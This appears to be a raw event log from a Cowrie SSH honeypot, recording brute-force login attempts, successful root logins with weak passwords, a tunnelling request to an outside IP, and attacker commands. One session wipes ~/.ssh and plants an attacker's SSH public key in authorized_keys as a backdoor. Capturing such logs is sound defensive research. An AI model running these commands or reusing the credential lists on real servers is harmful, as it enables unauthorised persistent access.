{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59703,"dst_ip":"1.2.3.4","dst_port":22,"session":"53d82bca98dc","protocol":"ssh","message":"New connection: 212.227.235.229:59703 (1.2.3.4:22) [session: 53d82bca98dc]","sensor":"my-vps","timestamp":"2025-08-28T20:41:12.284593Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26111979","message":"login attempt [admin/26111979] failed","sensor":"my-vps","timestamp":"2025-08-28T20:41:12.560998Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:41:13.541236Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:41:13.542390Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26091980","message":"login attempt [admin/26091980] failed","sensor":"my-vps","timestamp":"2025-08-28T20:41:13.622392Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26071993","message":"login attempt [admin/26071993] failed","sensor":"my-vps","timestamp":"2025-08-28T20:41:14.684563Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061988","message":"login attempt [admin/26061988] failed","sensor":"my-vps","timestamp":"2025-08-28T20:41:15.745771Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":59684,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec1cfdfc17f7","protocol":"ssh","message":"New connection: 201.148.180.50:59684 (1.2.3.4:22) [session: ec1cfdfc17f7]","sensor":"my-vps","timestamp":"2025-08-28T20:41:16.643584Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061984","message":"login attempt [admin/26061984] failed","sensor":"my-vps","timestamp":"2025-08-28T20:41:16.806550Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:41:17.868217Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:41:21.169971Z","src_ip":"201.148.180.50","session":"ec1cfdfc17f7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:41:38.476607Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:41:38.477963Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29995,"dst_ip":"1.2.3.4","dst_port":22,"session":"39ac386d7bdb","protocol":"ssh","message":"New connection: 212.227.235.229:29995 (1.2.3.4:22) [session: 39ac386d7bdb]","sensor":"my-vps","timestamp":"2025-08-28T20:41:56.724176Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:41:56.725399Z","src_ip":"212.227.235.229","session":"39ac386d7bdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30338,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad35b9980ad1","protocol":"ssh","message":"New connection: 212.227.235.229:30338 (1.2.3.4:22) [session: ad35b9980ad1]","sensor":"my-vps","timestamp":"2025-08-28T20:41:56.881680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:41:56.883168Z","src_ip":"212.227.235.229","session":"ad35b9980ad1"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T20:41:57.042111Z","src_ip":"212.227.235.229","session":"ad35b9980ad1"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:41:57.520195Z","src_ip":"212.227.235.229","session":"ad35b9980ad1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T20:41:57.679875Z","session":"ad35b9980ad1"}
{"eventid":"cowrie.login.success","username":"root","password":"12121212","message":"login attempt [root/12121212] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:42:18.027032Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58916,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc33354378d7","protocol":"ssh","message":"New connection: 217.72.205.35:58916 (1.2.3.4:22) [session: bc33354378d7]","sensor":"my-vps","timestamp":"2025-08-28T20:42:21.917221Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:42:21.919974Z","src_ip":"217.72.205.35","session":"bc33354378d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:42:55.148802Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T20:42:55.149871Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f793ebe9548","protocol":"ssh","message":"New connection: 212.227.125.160:6100 (1.2.3.4:22) [session: 1f793ebe9548]","sensor":"my-vps","timestamp":"2025-08-28T20:43:00.446333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T20:43:00.841098Z","src_ip":"212.227.125.160","session":"1f793ebe9548"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T20:43:01.231405Z","src_ip":"212.227.125.160","session":"1f793ebe9548"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T20:43:05.409117Z","src_ip":"212.227.125.160","session":"1f793ebe9548"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:43:05.410802Z","src_ip":"212.227.125.160","session":"1f793ebe9548"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:43:06.881982Z","src_ip":"212.227.235.229","session":"ad35b9980ad1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"15.8","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 15.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:43:10.909333Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.session.closed","duration":"131.7","message":"Connection lost after 131.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:43:23.943922Z","src_ip":"212.227.235.229","session":"53d82bca98dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42032,"dst_ip":"1.2.3.4","dst_port":22,"session":"d103022f3917","protocol":"ssh","message":"New connection: 212.227.235.229:42032 (1.2.3.4:22) [session: d103022f3917]","sensor":"my-vps","timestamp":"2025-08-28T20:45:16.755601Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:16.934260Z","src_ip":"212.227.235.229","session":"d103022f3917"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42042,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec536e925183","protocol":"ssh","message":"New connection: 212.227.235.229:42042 (1.2.3.4:22) [session: ec536e925183]","sensor":"my-vps","timestamp":"2025-08-28T20:45:17.110719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:45:17.111748Z","src_ip":"212.227.235.229","session":"ec536e925183"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:45:17.289203Z","src_ip":"212.227.235.229","session":"ec536e925183"}
{"eventid":"cowrie.login.failed","username":"karina","password":"karina","message":"login attempt [karina/karina] failed","sensor":"my-vps","timestamp":"2025-08-28T20:45:17.828393Z","src_ip":"212.227.235.229","session":"ec536e925183"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:19.004856Z","src_ip":"212.227.235.229","session":"ec536e925183"}
{"eventid":"cowrie.session.connect","src_ip":"154.92.19.63","src_port":47702,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0ea3eb2c344","protocol":"ssh","message":"New connection: 154.92.19.63:47702 (1.2.3.4:22) [session: b0ea3eb2c344]","sensor":"my-vps","timestamp":"2025-08-28T20:45:32.235128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:45:32.236140Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:45:32.432582Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.login.success","username":"root","password":"qwedsa123","message":"login attempt [root/qwedsa123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:45:33.260194Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:45:33.671922Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:45:33.672621Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:45:33.673572Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:33.871086Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:45:34.321040Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.321808Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.519987Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.520825Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.session.connect","src_ip":"154.92.19.63","src_port":55766,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cf14082405e","protocol":"ssh","message":"New connection: 154.92.19.63:55766 (1.2.3.4:22) [session: 8cf14082405e]","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.726920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.727819Z","src_ip":"154.92.19.63","session":"8cf14082405e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:45:34.931767Z","src_ip":"154.92.19.63","session":"8cf14082405e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T20:45:35.790049Z","src_ip":"154.92.19.63","session":"8cf14082405e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:36.997512Z","src_ip":"154.92.19.63","session":"8cf14082405e"}
{"eventid":"cowrie.session.connect","src_ip":"154.92.19.63","src_port":55776,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad7b37c84066","protocol":"ssh","message":"New connection: 154.92.19.63:55776 (1.2.3.4:22) [session: ad7b37c84066]","sensor":"my-vps","timestamp":"2025-08-28T20:45:37.202227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:45:37.203159Z","src_ip":"154.92.19.63","session":"ad7b37c84066"}
